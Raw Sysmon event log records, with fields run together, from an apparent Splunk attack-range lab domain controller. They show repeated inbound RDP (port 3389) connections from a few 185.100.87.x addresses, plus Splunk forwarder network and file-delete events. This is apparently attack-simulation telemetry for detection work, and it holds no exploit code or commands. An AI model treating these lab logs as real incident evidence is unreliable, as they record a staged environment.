SERVICEtcpfalsefalse185.100.87.93-38272-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099603Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:55.635{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-38138-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099602Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:55.597{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-50848-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099601Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:55.469{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-50606-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099600Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:55.018{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-37048-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099599Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:55.011{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53334-false10.0.1.12-8000- 354300x800000000000000099598Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.807{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-36658-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099610Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:56.829{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-53324-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099609Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:56.642{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-39710-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099608Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:56.507{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-52710-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099619Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:57.774{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-55426-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099618Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:57.744{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-41678-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099617Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:57.522{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-41296-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099616Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:57.497{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-41224-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099615Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:57.435{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-54684-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099614Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:57.318{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-54432-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099613Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:57.006{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-53696-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099612Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:56.847{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-40048-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 23542300x800000000000000099611Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:01.053{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E7EAD282687196AADA36D87A0D84FC2,SHA256=BC5B069850781A1A21EAD5709E8DCED8FD41145BAA26D14FE39BAB2218805A80,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099628Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:02.521{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=20C27D8C35E1EF0FC0BFC163D255E889,SHA256=0307204356A13CA3544E5122A5A910E7BE45EA5DA32278CC60341ACC7CBC6FEA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099627Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:58.849{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-57640-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099626Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:58.684{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-57248-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099625Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:58.684{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-43316-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099624Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:58.654{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-60984-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099623Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:58.490{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-42954-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099622Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:58.385{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-56648-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099621Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:58.295{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-60050-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 23542300x800000000000000099620Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:02.146{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E262284FFF87CB9322FD47BAE0183DE9,SHA256=101F47F68A60662BA401771C4A4C2F13C71B4F4A85F41F0C80B0A53B21035466,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099639Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:59.651{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-59306-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099638Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:59.569{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-44860-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099637Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:59.481{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-34426-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099636Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:59.351{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-44466-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099635Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:59.339{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-44468-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099634Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:59.267{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-58544-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099633Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:59.182{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-58352-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099632Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:59.027{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-33568-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099631Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:59.019{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-33590-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099630Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:59.017{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-33578-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 23542300x800000000000000099629Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:03.240{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C4640EEF3734612C234C032097E6F73,SHA256=E0DBAC43D533B9D0F2E6AA1DEBCA009009D470186250AA7E2E990C192FA5A285,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099651Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:00.971{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-37588-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099650Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:00.948{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53335-false10.0.1.12-8000- 354300x800000000000000099649Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:00.878{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-37392-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099648Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:00.864{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-37356-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099647Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:00.713{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-33392-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099646Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:00.594{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-33130-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099645Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:00.552{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-36760-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099644Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:00.534{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-46584-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099643Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:00.331{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-46234-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099642Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:00.305{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-36088-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099641Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:00.213{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-60590-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 23542300x800000000000000099640Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:04.334{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C7716A719158A31EAC4B037E1CCE7F8,SHA256=F13C1D6549503CD5C79FE7BF58D5C42F18077D10A2392B4950B70DAD775C8958,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099659Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:05.427{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F2E7061CF32D689A1F6DB56518A89D6,SHA256=B944D53FC7AF428E04B904BD8294D5CC8E688C3B3A6FCB239D84B4933A3C33D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099658Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:01.517{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-35070-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099657Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:01.424{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-48126-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099656Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:01.372{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-38396-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099655Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:01.213{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-47780-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099654Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:01.173{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-47676-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099653Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:01.107{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-34240-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099652Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:01.020{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-34042-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 23542300x800000000000000099671Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:06.521{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B5CF8E802F3A2634FA6ABC19264A5E9,SHA256=9D8F694A7B4E2CBB2321DC5F454C6D83F56AA93AC2640067427CFA99C15EDFDB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099670Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:02.872{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-41288-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099669Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:02.862{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-37700-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099668Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:02.762{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-41108-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099667Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:02.748{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-41092-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099666Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:02.557{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-37046-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099665Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:02.431{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-36800-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099664Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:02.428{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-40460-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099663Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:02.366{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-49618-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099662Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:02.200{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-39938-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099661Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:02.169{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-49296-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099660Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:02.055{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-36102-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 23542300x800000000000000099680Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.615{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42399E9CC1F06CD090CF022905DA0A1E,SHA256=920AE4C0EF29F53BAB0CEB04739EDE556D69A0862E633E994C1D6A1D80E4754A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099679Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:04.029{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-52492-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099678Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:03.895{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-39688-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099677Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:03.375{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 